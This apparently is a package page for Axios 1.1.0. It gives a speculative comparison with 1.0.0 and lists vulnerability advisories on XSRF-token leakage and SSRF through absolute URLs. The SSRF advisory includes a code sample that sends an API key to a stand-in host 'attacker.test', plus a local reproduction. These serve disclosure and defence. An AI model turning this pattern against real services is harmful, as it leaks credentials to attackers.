Axios version 1.1.0 is a minor update to the popular promise-based HTTP client for browsers and Node.js, building upon the solid foundation of version 1.0.0. Both versions share the same core dependencies, including "form-data," "proxy-from-env," and "follow-redirects," ensuring consistent functionality for handling form data, proxy configurations, and HTTP redirects. Similarly, the development dependencies remain largely unchanged, indicating a stable development environment and testing suite maintained between releases. This includes tools like Gulp, Karma, Mocha, ESLint, and Rollup for building, testing, and linting the library.
While the declared dependencies and devDependencies are identical, subtle refinements and bug fixes are likely the focus of the 1.1.0 release. The "dist" object reveals slight differences: version 1.1.0 has an unpacked size of 1301740 bytes compared to 1.0.0's 1297906 bytes. This minor size increase suggests the inclusion of additional code, potentially related to bug fixes, performance enhancements, or minor feature additions. Also, the release date of 1.1.0 (2022-10-06) is just two days after 1.0.0 (2022-10-04), implying that 1.1.0 could be a quick fix release or a targeted enhancement shortly following the major version update.
For developers, upgrading from 1.0.0 to 1.1.0 should be a relatively seamless process. Given the shared dependencies, breaking changes are improbable. Developers should always consult the official Axios changelog for detailed release notes outlining the specific changes implemented in version 1.1.0. While the scope of changes might be small, these refinements could address specific edge cases or improve overall library stability. Consequently, upgrading to benefit from the latest improvements is generally recommended.
All the vulnerabilities related to the version 1.1.0 of the package
Axios Cross-Site Request Forgery Vulnerability
An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL
A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery). Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if baseURL
is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.
Consider the following code snippet:
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
In this example, the request is sent to http://attacker.test/
instead of the baseURL
. As a result, the domain owner of attacker.test
would receive the X-API-KEY
included in the request headers.
It is recommended that:
baseURL
is set, passing an absolute URL such as http://attacker.test/
to get()
should not ignore baseURL
.baseURL
with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL
.Follow the steps below to reproduce the issue:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
$ node main.js
this is server2
Even though baseURL
is set to http://localhost:10001/
, axios sends the request to http://localhost:10002/
.
baseURL
and does not validate path parameters is affected by this issue.